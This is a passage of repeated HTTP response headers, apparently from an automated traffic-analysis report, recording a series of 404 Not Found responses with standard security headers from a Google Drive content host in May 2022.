Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-W3UYFv+Ie1xzxHp/UhUuVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JbNj1tL3fqtTSYV51b5HHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LpbUQrySwB8DQzYgaGEAmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-afJFBIBpNVaRg6oIXRa0Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kIIsZzdh8W7MHrwsS2OBfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rA4C8Xfn1G91gnQPnVHYGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wgSHIj9FRefRs8PRUbuPVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-nkt0N4R1+rdW9JGz0a55kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:59 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JDpsg4DOJdk7wtQcviN+CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5JGtKpYwSay2d98x2LrZqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PrZs7XFycLkPcWCh+CVJ+w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-RbnaDV3ZBP/NOFcpqRdtCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uQ49sn7WQAhLSXW+n/VSiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ITCCJgCxL0bN9/EXngeOmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-iA4rQ050wQ+EPfB0xTV8/g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:00 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ytkwwP82nWIATFvk5+ewcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-/OKSLODRAhWQGjc2Ixr7Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1c4uCgWysrvLa0iFsWTJ5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:01 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-doj8trddkZGSD8ilZZSx9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 